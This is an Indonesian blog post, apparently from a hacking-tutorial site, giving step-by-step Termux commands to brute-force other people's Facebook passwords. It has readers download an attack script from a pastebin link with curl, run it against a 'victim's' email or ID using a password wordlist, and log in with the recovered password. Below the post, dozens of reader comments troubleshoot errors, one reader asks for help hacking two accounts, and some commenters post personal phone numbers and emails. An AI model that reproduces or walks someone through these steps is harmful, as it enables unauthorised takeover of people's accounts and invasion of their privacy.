Cara Hack Akun Facebook Brute Force ( Termux ) - Mastah Cyber

Mastah Cyber

Tutorial, Teknologi, Android, Dan Sebagainya

Breaking

Home Top Ad

Post Top Ad

Friday, May 18, 2018

Cara Hack Akun Facebook Brute Force ( Termux )


Halo guys, ditutorial kali ini saya akan memberi tutorial bagaimana cara hack akun facebook menggunakan metode brute force di termux.Sebelum ke tutorial nya saya akan memberikan sedikit penjelasan tentang brute force.
Jadi Brute Force adalah metode untuk meretas password dengan mencoba semua kombinasi password yang ada pada wordlist, metode ini kemungkinan besar berhasil namun metode ini membutuhkan waktu yang lumayan lama.
Langsung saja ke tutorial cara hack akun facebook menggunakan metode brute force di termux :

  • Buka termux
  • Upgrade dan update dengan perintah.
apt update && apt upgrade

  •  Install lah python 2 dengan perintah.
apt install python2

  •  Install juga python 2 developer dengan perintah.
apt install python2-dev

  •  Yang terakhir install lah mechanize dengan perintah.
pip2 install mechanize

  • Download lah file facebook brute force nya dengan perintah.
curl -S https://pastebin.com/raw/yUpg8zsv --output fb.py

  • Download juga wordlist nya DISINI
  • Jalankan alat nya dengan perintah.
python2 fb.py

  •  Masukan Email/No/Id facebook korban lalu enter.
  • Masukan wordlist nya dengan perintah sesuai dengan folder tempat wordlist nya.contoh saya mendownload menggunakan chrome jadi tempat folder nya ada di Download jadi perintahnya adalah.
/sdcard/Download/password.txt

      • Setelah itu kalian tinggal enter lalu tunggu sampai berhasil, kalau berhasil bakal muncul seperti itu.
      Kalau sudah ketemu seperti itu kalian tinggal login menggunakan email/no/id korban dan menggunakan password yang berhasil. :D happy hacking.

      Sekian sampai jumpa :D.

      230 comments:

      1. mantap gini web nya gan mantap :D

        ReplyDelete
        Replies
        1. Gan cara unduh wordlist nya gmna gan saya masih bingung

          Delete
        2. Udah berhasil bang,terus password yang harus di ambil yang mana bang?

          Delete
        3. Kenapa kaya gini terus

          [*] Error: check your password list path

          Delete
      2. [*] Error: check your password list path solusinya

        ReplyDelete
        Replies
        1. Berarti tempat ntimpen wordlistnya salah

          Delete
        2. Kok GK bisa² ya gan biasa nya yg baut nyimpen word list nya apa ya?

          Delete
        3. Gk bisa gan tetep w udh pindahin kemana mana

          Delete
        4. Iyaa gan gimana tuu tuu gabisa

          Delete
        5. Coba perintah ini dulu gan termux-setup-storage

          Delete
        6. Simpen file wordlist nya di luar folder gan jadi ntar perintah nya tinggal /sdcard/password.txt

          Delete
        7. Kok pas python2 fb.py no such file ya gan

          Delete
        8. Solusi nya dong gan masih belom paham

          Delete
        9. Yang mau gw bantuin chat wa saya 088212465142

          Delete
      3. python2: can't open file 'fb.py': [Errno 2] No such file or directory

        ReplyDelete
      4. python2: can't open file 'fb.py': [Errno 2] No such file or directory

        ReplyDelete
        Replies
        1. Install dulu gan url nya kek gini "pkg install url"

          tanda " gk usah dibuat

          Delete
        2. saya pun sama udah diulangi udah diunduh

          Delete
        3. Aktifkan penyimpanan file manager

          Delete
      5. Worldlist itu di buat gan bukan di Download.

        ReplyDelete
      6. Kenapa error check your password list path terus bang?

        ReplyDelete
      7. Replies
        1. saya mengerti skrng jadi yg di password.txt itu dia semacam kumpulan password nah apa bila ada yg sesuai maka sukses tapi apa bila target itu passwordnya tidak ada dlm daftar password.txt maka gagal,, ini bnr gak ??
          Krn saya udh cek sendiri gan

          Delete
      8. Kok mentok di Python3 FB.py
        Pas nyari passnya gagal terus
        Malah "check your password list path"

        ReplyDelete
        Replies
        1. Udah diunduh nelum wordlist nya?

          Delete
        2. Ane udah download tuh wordlist nya tempatnya udah betul tapi kok masih ngk bisa

          Delete
      9. Cara nyari wordlist yg udah di unduh gmana gan

        ReplyDelete
      10. Replies
        1. Gimanaaaaaaaaaaaaa bang woe

          Delete
        2. Kirim ss nya gan via email kirim ke zulfihidayat10@gmail.com

          Delete
        3. Gan, mindahin dari download ke luar gimana, mohon pencerahannya ya...

          Delete
      11. Bang rekomendasi buat memory internal apa code nya.. abe gk support SDcard

        ReplyDelete
        Replies
        1. Sebelumnya izinin dulu pake perintah termux-setup-storage

          Delete
      12. Bang kalo saya nyimpennya di penyimpanan internal jadi kek gimana bang? Perintahnya

        ReplyDelete
      13. Commed line option s is not understood. Kenapa bang?

        ReplyDelete
      14. Gan gimana cara download wordlistnya? Gw ke link kok malah ketemu iklan vpn.

        ReplyDelete
      15. Kayanya gak mungkin pasword ketemu . Karena smua yg ada di password.txt ga mungkin ada password kalian . Cuman password kalian aja ga ada . Apa lagi password orang .
        Itu dya bisa ketemu passwordnya karena paswordnya sebelumnya udah di masukin ke dalem password.txt. sama kaya kita nebak2 password orang pass mau login. Kurang hot gan.

        ReplyDelete
        Replies
        1. Nah emang gan kemungkinan 50% ketemu soalnya dalam wordlist itu password yang biasa digunakan orang - orang

          Delete
      16. Replies
        1. kok gini gen gagal

          python2: can't open file 'fb.py': [Errno 2] No such file or directory

          Delete
        2. Belum krunduh itu gan scriptnya

          Delete
        3. cara unduh script nya gmana

          Delete
      17. Cra download wordlistnya gmn bang

        ReplyDelete
      18. bang kalau di penyimpanan internal cara masukin wordlistnya gimana

        ReplyDelete
      19. Kok GK mau masuk ke worlldlistnya ya gan..?solusinya gmna...gua ada tugas suruh hack 2 akun....tolong gan please..orang nya mohon² suruh di hack

        ReplyDelete
        Replies
        1. Email saya aja gan sertakan ss nya gan ke zulfihidayat10@gmail.com

          Delete
        2. Masukan email nya waktu di bagian yg mana ya gan? Bisa di screenshot..

          Delete
        3. Iya konyak saya aja via email itu sertakan ss nya

          Delete
        4. Chat WA saya gan, 085359198739
          Btuh bantuan

          Delete
        5. Via email aja gan kirim masalahnya ke zulfihidayat10@gmail.com

          Delete
      20. kalau Password.txt Nya Di Penyimpanan Telepon(Internal) Itu Gimana?Saya Sudah Mengikuti Namun TidakBisa

        ReplyDelete
        Replies
        1. /sdcard/wordlistnya.txt

          Atau jika didalam folder

          /sdcard/folder/wordlist.txt

          Delete
        2. Bang kalo di storage gimana

          Delete
        3. Storage itu penyimpanan internal

          Delete
        4. Apa codeny magsud dia wad00 adminnya nyebelin

          Delete
        5. Itu gan codenya yang /sdcard/blabla itu

          Delete
      21. Bang prosesnya lama yah ..ko nyampe mencoba password ke 110

        ReplyDelete
      22. Makasih banyak gan, ane bakalan gunain tipsnya dengan baik

        ReplyDelete
      23. gan, kira2 samapai berapa jam-an itu sampai proses pencariannya dapat gan?

        ReplyDelete
      24. Replies
        1. Nah iya tuh gan tulisannya "command crl" saya gak bisanya disitu gan

          Delete
      25. Bang
        Ini pake sdcard apa pake memory internal
        Mohon pencerahannya

        ReplyDelete
      26. gan error : check your pass link path

        ini masalahnya dimaa gan

        ReplyDelete
        Replies
        1. gw email problemnya gan..tlng di bantu yaa

          Delete
      27. Broo gw kok ga bisa ya waktu masukkan wordlistnya padahal aku sudah turutin perintahnya

        ReplyDelete
      28. Perkiraan selesai berapa jam???

        ReplyDelete
      29. Gan tolong chat saya via wa..saya ada pertanyaan tentang pas masukin passwordnya gk bisa...wa saya 085762959417

        ReplyDelete
        Replies
        1. Itu gan salah nyimpennya gan folder nya kalau misalnya ada di folder download berarti /sdcard/download/namawordlistnya.txt

          Delete
      30. Alhamdulillah sudah proses find passwordnya , itu emang lama banget ya gan ?

        ReplyDelete
      31. Gan saya pas di suruh ddownlod brute face nya gagal mulu knapa ya
        The program curl not instaled pencerhan nya gan

        ReplyDelete
        Replies
        1. Lakuin perintah ini dulu gan ( pkg install curl )

          Delete
      32. lama bang gmn ya sampe lebih dri 100%

        ReplyDelete
      33. bang ko lama bngt yaa...sma 500 gtu nyari pw nya busetdaahh

        ReplyDelete
      34. EROR cek your Pasword list path (maksudnya apa yak?)

        ReplyDelete
      35. Itu /sdcard/Download/password.txt (kan di kartu memori) kalau di internal tulisanya gimana?

        ReplyDelete
      36. "curl is not installed" knp itu boss... solysiny boss

        ReplyDelete
      37. Can't open file fb. Py [error 2]

        Kira kira gimana cara mengatasinya gan? ?

        Mohon pencerahannya

        ReplyDelete
      38. /sdcard/download/pass. Txt : permission denied

        Setelah mincul gitu trs gimana bg??

        ReplyDelete
      39. curl -S https://pastebin.com/raw/yUpg8zsv --output fb.py
        The program 'curl' is not installed. Install it by executing:
        pkg install curl



        Cara atasi gimana bang

        ReplyDelete
      40. Lama amat gw pencarian pw nya sampe 100+

        ReplyDelete
      41. Lama banget gan nungguin passwordnya. Udah gitu juga makan banyak kuota internet

        ReplyDelete
      42. Gan saya kendala di penyimpanan sama python dev dan curlnya

        ReplyDelete
        Replies
        1. Kirim ss nya gan sama masalahnya ke email zhodayat@gmail.com

          Delete
      43. termux nya uda jlan. tpi knpa gk brnti jga pdahal password fb yg sngaja d buat utk coba yg ada d list uda d lewatin

        ReplyDelete
      44. apa beda dan prsamaan termux, terminal ide dan terminal emulator

        ReplyDelete
      45. Itu masukan alamat file mksdny apaan ? Kasih pencerahan dong

        ReplyDelete
      46. ya kali gan disuruh nunggu 8ribu 7rts crack password lama bner

        ReplyDelete
        Replies
        1. Namanya juga usaha terus kan ini metode bruteforce gan jadi ya tergantung wordlist jyga gan kalo mau yg sedikit cari yang wordlist sedikit tapi keberhasilan nya juga kecil gan

          Delete
      47. NihiL
        Itu pasword di acak dalam wordlist, bsama aja kyk main puzzle.. zzz
        Kurang membantu gan

        ReplyDelete
        Replies
        1. Iya tapi otomatis jadi ya lumayan lama juga tapi itu ada kok tutorial hack akun sosial media pake shellphish gan

          Delete
      48. Bro kok tetep "mencoba password ke" gitu ya

        ReplyDelete
      49. 87309 passwords gak ada yang benar

        ReplyDelete
      50. Gan kalo nyimpan nya di internal gimana gan

        ReplyDelete
      51. Kok saya mentok di "check your password list Path" terus ya??

        ReplyDelete
      52. Bang ini prosesnya pake internet yak?
        Punya saya ga jalan jalan kalo offline

        ReplyDelete
      53. Kalau kyak gini gimana ?

        /sdcard/download/password.txt
        bash: /sdcard/download/password.txt: No such file or directory

        ReplyDelete
        Replies
        1. Taruh nya diluar folder aja gan jadi /sdcard/password.txt

          Delete
      54. Bisa sih bisa tapi nunggu ny lama banget wkwk password ny bnyk banget yg mau di crack gan,mohon gan klo gk bisa di kurangi buat loading crack ny lebih cpt lagi,tapi udh bagus kok ��.

        ReplyDelete
      55. Gan python2 fb.py (error) gimana gan??

        ReplyDelete
      56. curl -S https://pastebin.com/raw/yUpg8zsv --output fb.py ini kok saya gak bisa ya gan. Gimana ini caranya

        ReplyDelete
        Replies
        1. Kirim ss masalahnya gan ke email zulfihidayat10@gmail.com

          Delete
      57. Hoax,,,gw coba di fb gw password nya gk ketemu..😂😂

        ReplyDelete
      58. Perintah indahnya tidak berfungsi. Eror... Not instaled

        ReplyDelete
        Replies
        1. Coba sss kitim ke email zulfihidayat10@gmail.com

          Delete
      59. Bang ko punya saya mencoba password mulu ... Apa emng ky gitu

        ReplyDelete
      60. curl: option -S https://pastebin.com/raw/yUpg8zsv: is unknown
        curl: try 'curl --help' for more information
        Gimana ini??

        ReplyDelete
      61. Kemungkinan berhasilnya 20% itupun kalo beruntung yak ;-)

        ReplyDelete
      62. Mencoba passwordnya ampe angka keberapa yaa gann?

        ReplyDelete
      63. Itu yang pas eror erno 2 tulis pkg install curl

        ReplyDelete
      64. kok gak ketemu passwordnya gan

        ReplyDelete
      65. kok gak ketemu passwordnya gan

        ReplyDelete
      66. Mau nanya worldlist nya bentuk nya ko apk?

        ReplyDelete
        Replies
        1. Untuk wordlist itubentuknya txt (text) salah download kali gan

          Delete
      67. Kok ga berhenti nyari password-nya

        ReplyDelete
      68. Stah pas perintah python2 fb.py kok tulisanya can't open file 'fb.py'

        ReplyDelete
      69. Cari pass nya lama banget nih sam 100 lbih

        ReplyDelete
      70. Gan kok masih nggak bisa juga y
        Udh gw coba dari tadi masih juga nggak bisa bagi solusi nya dong gan

        ReplyDelete
      71. Apaan si hoax juga payah.masaa coba pasword nya stiap id sama smua

        ReplyDelete

      Post Bottom Ad

      Responsive Ads Here